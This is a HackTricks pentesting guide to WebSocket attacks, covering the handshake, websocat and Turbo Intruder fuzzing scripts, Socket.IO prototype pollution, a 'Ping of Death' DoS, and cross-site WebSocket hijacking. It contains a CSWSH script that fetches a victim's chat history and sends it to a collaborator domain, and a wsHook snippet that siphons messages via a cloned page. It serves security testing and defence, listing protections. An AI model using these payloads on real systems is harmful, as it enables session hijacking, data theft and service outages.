hacktricks/src/pentesting-web/websocket-attacks.md
HackTricks News Bot e9397d8fa5 Add content from: WebSocket Turbo Intruder: Unearthing the WebSocket Goldmine
- Remove searchindex.js (auto-generated file)
2025-09-17 18:29:53 +00:00

346 lines
19 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# WebSocket Attacks
{{#include ../banners/hacktricks-training.md}}
## What are WebSockets
WebSocket connections are established through an initial **HTTP** handshake and are designed to be **long-lived**, allowing for bidirectional messaging at any time without the need for a transactional system. This makes WebSockets particularly advantageous for applications requiring **low latency or server-initiated communication**, such as live financial data streams.
### Establishment of WebSocket Connections
A detailed explanation on establishing WebSocket connections can be accessed [**here**](https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc). In summary, WebSocket connections are usually initiated via client-side JavaScript as shown below:
```javascript
var ws = new WebSocket("wss://normal-website.com/ws")
```
The `wss` protocol signifies a WebSocket connection secured with **TLS**, whereas `ws` indicates an **unsecured** connection.
During the connection establishment, a handshake is performed between the browser and server over HTTP. The handshake process involves the browser sending a request and the server responding, as illustrated in the following examples:
Browser sends a handshake request:
```javascript
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket
```
Server's handshake response:
```javascript
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
```
The connection remains open for message exchange in both directions once established.
**Key Points of the WebSocket Handshake:**
- The `Connection` and `Upgrade` headers signal the initiation of a WebSocket handshake.
- The `Sec-WebSocket-Version` header indicates the desired WebSocket protocol version, usually `13`.
- A Base64-encoded random value is sent in the `Sec-WebSocket-Key` header, ensuring each handshake is unique, which helps to prevent issues with caching proxies. This value is not for authentication but to confirm that the response is not generated by a misconfigured server or cache.
- The `Sec-WebSocket-Accept` header in the server's response is a hash of the `Sec-WebSocket-Key`, verifying the server's intention to open a WebSocket connection.
These features ensure the handshake process is secure and reliable, paving the way for efficient real-time communication.
### Linux console
You can use `websocat` to establish a raw connection with a websocket.
```bash
websocat --insecure wss://10.10.10.10:8000 -v
```
Or to create a websocat server:
```bash
websocat -s 0.0.0.0:8000 #Listen in port 8000
```
### MitM websocket connections
If you find that clients are connected to a **HTTP websocket** from your current local network you could try an [ARP Spoofing Attack ](../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing)to perform a MitM attack between the client and the server.\
Once the client is trying to connect to you can then use:
```bash
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
```
### Websockets enumeration
You can use the **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **to discover, fingerprint and search for known** **vulnerabilities** in websockets automatically.
### Websocket Debug tools
- **Burp Suite** supports MitM websockets communication in a very similar way it does it for regular HTTP communication.
- The [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** will allow you to manage better Websocket communications in Burp by getting the **history**, setting **interception rules**, using **match and replace** rules, using **Intruder** and **AutoRepeater.**
- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Short for "**WebSocket/Socket.io Proxy**", this tool, written in Node.js, provides a user interface to **capture, intercept, send custom** messages and view all WebSocket and Socket.IO communications between the client and server.
- [**wsrepl**](https://github.com/doyensec/wsrepl) is an **interactive websocket REPL** designed specifically for penetration testing. It provides an interface for observing **incoming websocket messages and sending new ones**, with an easy-to-use framework for **automating** this communication.
- [**https://websocketking.com/**](https://websocketking.com/) it's a **web to communicate** with other webs using **websockets**.
- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) among other types of communications/protocols, it provides a **web to communicate** with other webs using **websockets.**
## Decrypting Websocket
- [https://github.com/Anof-cyber/PyCript](https://github.com/Anof-cyber/PyCript)
- [https://github.com/Anof-cyber/PyCript-WebSocket/](https://github.com/Anof-cyber/PyCript-WebSocket/)
## Websocket Lab
In [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) you have a code to launch a web using websockets and in [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) you can find an explanation.
## Websocket Fuzzing
The burp extension [**Backslash Powered Scanner**](https://github.com/PortSwigger/backslash-powered-scanner) now allows to fuzz also WebSocket messages. You can read more infromation abou this [**here**](https://arete06.com/posts/fuzzing-ws/#adding-websocket-support-to-backslash-powered-scanner).
### WebSocket Turbo Intruder (Burp extension)
PortSwigger's WebSocket Turbo Intruder brings Turbo Intruderstyle Python scripting and highrate fuzzing to WebSockets. Install it from the BApp Store or from source. It includes two components:
- Turbo Intruder: highvolume messaging to a single WS endpoint using custom engines.
- HTTP Middleware: exposes a local HTTP endpoint that forwards bodies as WS messages over a persistent connection, so any HTTPbased scanner can probe WS backends.
Basic script pattern to fuzz a WS endpoint and filter relevant responses:
```python
def queue_websockets(upgrade_request, message):
connection = websocket_connection.create(upgrade_request)
for i in range(10):
connection.queue(message, str(i))
def handle_outgoing_message(websocket_message):
results_table.add(websocket_message)
@MatchRegex(r'{\"user\":\"Hal Pline\"')
def handle_incoming_message(websocket_message):
results_table.add(websocket_message)
```
Use decorators like `@MatchRegex(...)` to reduce noise when a single message triggers multiple responses.
### Bridge WS behind HTTP (HTTP Middleware)
Wrap a persistent WS connection and forward HTTP bodies as WS messages for automated testing with HTTP scanners:
```python
def create_connection(upgrade_request):
connection = websocket_connection.create(upgrade_request)
return connection
@MatchRegex(r'{\"user\":\"You\"')
def handle_incoming_message(websocket_message):
results_table.add(websocket_message)
```
Then send HTTP locally; the body is forwarded as the WS message:
```http
POST /proxy?url=https%3A%2F%2Ftarget/ws HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 16
{"message":"hi"}
```
This lets you drive WS backends while filtering for “interesting” events (e.g., SQLi errors, auth bypass, command injection behavior).
### Socket.IO handling (handshake, heartbeats, events)
Socket.IO adds its own framing on top of WS. Detect it via the mandatory query parameter `EIO` (e.g., `EIO=4`). Keep the session alive with Ping (`2`) and Pong (`3`) and start the conversation with `"40"`, then emit events like `42["message","hello"]`.
Intruder example:
```python
import burp.api.montoya.http.message.params.HttpParameter as HttpParameter
def queue_websockets(upgrade_request, message):
connection = websocket_connection.create(
upgrade_request.withUpdatedParameters(HttpParameter.urlParameter("EIO", "4")))
connection.queue('40')
connection.queue('42["message","hello"]')
@Pong("3")
def handle_outgoing_message(websocket_message):
results_table.add(websocket_message)
@PingPong("2", "3")
def handle_incoming_message(websocket_message):
results_table.add(websocket_message)
```
HTTP adapter variant:
```python
import burp.api.montoya.http.message.params.HttpParameter as HttpParameter
def create_connection(upgrade_request):
connection = websocket_connection.create(
upgrade_request.withUpdatedParameters(HttpParameter.urlParameter("EIO", "4")))
connection.queue('40')
connection.decIn()
return connection
@Pong("3")
def handle_outgoing_message(websocket_message):
results_table.add(websocket_message)
@PingPong("2", "3")
def handle_incoming_message(websocket_message):
results_table.add(websocket_message)
```
### Detecting serverside prototype pollution via Socket.IO
Following PortSwiggers safe detection technique, try polluting Express internals by sending a payload like:
```json
{"__proto__":{"initialPacket":"Polluted"}}
```
If greetings or behavior change (e.g., echo includes "Polluted"), you likely polluted server-side prototypes. Impact depends on reachable sinks; correlate with the gadgets in the Node.js prototype pollution section. See:
- Check [NodeJS __proto__ & prototype Pollution](deserialization/nodejs-proto-prototype-pollution/README.md) for sinks/gadgets and chaining ideas.
### WebSocket race conditions with Turbo Intruder
The default engine batches messages on one connection (great throughput, poor for races). Use the THREADED engine to spawn multiple WS connections and fire payloads in parallel to trigger logic races (doublespend, token reuse, state desync). Start from the example script and tune concurrency in `config()`.
- Learn methodology and alternatives in [Race Condition](race-condition.md) (see “RC in WebSockets”).
### WebSocket DoS: malformed frame “Ping of Death”
Craft WS frames whose header declares a huge payload length but send no body. Some WS servers trust the length and preallocate buffers; setting it near `Integer.MAX_VALUE` can cause OutOfMemory and a remote unauth DoS. See the example script.
### CLI and debugging
- Headless fuzzing: `java -jar WebSocketFuzzer-<version>.jar <scriptFile> <requestFile> <endpoint> <baseInput>`
- Enable the WS Logger to capture and correlate messages using internal IDs.
- Use `inc*`/`dec*` helpers on `Connection` to tweak message ID handling in complex adapters.
- Decorators like `@PingPong`/`@Pong` and helpers like `isInteresting()` reduce noise and keep sessions alive.
### Operational safety
Highrate WS fuzzing can open many connections and send thousands of messages per second. Malformed frames and high rates may cause real DoS. Use only where permitted.
## Cross-site WebSocket hijacking (CSWSH)
**Cross-site WebSocket hijacking**, also known as **cross-origin WebSocket hijacking**, is identified as a specific case of **[Cross-Site Request Forgery (CSRF)](csrf-cross-site-request-forgery.md)** affecting WebSocket handshakes. This vulnerability arises when WebSocket handshakes authenticate solely via **HTTP cookies** without **CSRF tokens** or similar security measures.
Attackers can exploit this by hosting a **malicious web page** that initiates a cross-site WebSocket connection to a vulnerable application. Consequently, this connection is treated as part of the victim's session with the application, exploiting the lack of CSRF protection in the session handling mechanism.
In order for this attack to work, these are the requirements:
- The websocket **authentication must be cookie based**
- The cookie must be accessible from the attackers server (this usually means **`SameSite=None`**) and no **Firefox Total Cookie Protection** enabled in Firefox and no **blocked third-party cookies** in Chrome.
- The websocket server must not check the origin of the connection (or this must be bypasseable)
Also:
- If the authentication is based on a local connection (to localhost or to a local network) the attack **will be possible** as no current protection forbids it (check [more info here](https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/))
### Simple Attack
Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**.
Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.:
```html
<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY"); //Send the message to retreive confidential information
}
function handleReply(event) {
//Exfiltrate the confidential information to attackers server
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>
```
### Cross Origin + Cookie with a different subdomain
In this blog post [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) the attacker managed to **execute arbitrary Javascript in a subdomain** of the domain where the web socket communication was occurring. Because it was a **subdomain**, the **cookie** was being **sent**, and because the **Websocket didn't check the Origin properly**, it was possible to communicate with it and **steal tokens from it**.
### Stealing data from user
Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:
```javascript
//This is the script tag to load the websocket hooker
;<script src="wsHook.js"></script>
//These are the functions that are gonig to be executed before a message
//is sent by the client or received from the server
//These code must be between some <script> tags or inside a .js file
wsHook.before = function (data, url) {
var xhttp = new XMLHttpRequest()
xhttp.open("GET", "client_msg?m=" + data, true)
xhttp.send()
}
wsHook.after = function (messageEvent, url, wsObject) {
var xhttp = new XMLHttpRequest()
xhttp.open("GET", "server_msg?m=" + messageEvent.data, true)
xhttp.send()
return messageEvent
}
```
Now download the `wsHook.js` file from [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) and **save it inside the folder with the web files**.\
Exposing the web application and making a user connect to it you will be able to steal the sent and received messages via websocket:
```javascript
sudo python3 -m http.server 80
```
### CSWSH Protections
The CSWSH attack is based on the fact that an **user will connect to a malicious page** that will **open a websocket connection** to a web page where the user is already connected and will authenticate as him as the request will send the user's cookies.
Nowadays, it's very easy to prevent this issue:
- **Websocket server checking the origin**: The websocket server should always check from where a suer is connecting to prevent unexpected pages from connecting to it.
- **Authentication token**: Instead of basing the authentication on a cookie, the websocket connection could be based on a token that is generated by the server for the user unknown to the attacker (like an anti-CSRF token)
- **SameSite Cookie attribute**: Cookies with `SameSite` value as `Lax` or `Strict` won't be sent from an external attackers page to the victim server, therefore, cookie based authentication won't be successful. Note that Chrome now puts the value **`Lax`** to the cookies withuot this flag specfied maing this more secure by default. Although, the first 2 minutes a cookie is created it will have the value **`None`** making it vulnerable during that imited period of time (also it's expected that this meassure will be removed at some point).
- **Firefox Total Cookie Protection**: Total Cookie Protection works by isolating cookies to the site in which they are created. Essentially each site has its own cookie storage partition to prevent third parties linking a users browsing history together. This makes **CSWSH unusable** as the attackers site won't have access to the cookies.
- **Chrome third-party cookies block**: This could also prevent sending the cookie of the authenticated user to the websocket server even with `SameSite=None`.
## Race Conditions
Race Conditions in WebSockets are also a thing, [check this information to learn more](race-condition.md#rc-in-websockets).
## Other vulnerabilities
As Web Sockets are a mechanism to **send data to server side and client side**, depending on how the server and client handles the information, **Web Sockets can be used to exploit several other vulnerabilities like XSS, SQLi or any other common web vuln using input of s user from a websocket.**
## **WebSocket Smuggling**
This vulnerability could allow you to **bypass reverse proxies restrictions** by making them believe that a **websocket communication was stablished** (even if it isn't true). This could allow an attacker to **access hidden endpoints**. For more information check the following page:
{{#ref}}
h2c-smuggling.md
{{#endref}}
## References
- [https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages](https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages)
- [https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/](https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/)
- [WebSocket Turbo Intruder: Unearthing the WebSocket Goldmine](https://portswigger.net/research/websocket-turbo-intruder-unearthing-the-websocket-goldmine)
- [WebSocket Turbo Intruder BApp Store](https://portswigger.net/bappstore/ba292c5982ea426c95c9d7325d9a1066)
- [WebSocketTurboIntruder GitHub](https://github.com/d0ge/WebSocketTurboIntruder)
- [Turbo Intruder background](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
- [Server-side prototype pollution safe detection methods](https://portswigger.net/research/server-side-prototype-pollution#safe-detection-methods-for-manual-testers)
- [WS RaceCondition PoC (Java)](https://github.com/redrays-io/WS_RaceCondition_PoC)
- [RaceConditionExample.py](https://github.com/d0ge/WebSocketTurboIntruder/blob/main/src/main/resources/examples/RaceConditionExample.py)
- [PingOfDeathExample.py](https://github.com/d0ge/WebSocketTurboIntruder/blob/main/src/main/resources/examples/PingOfDeathExample.py)
{{#include ../banners/hacktricks-training.md}}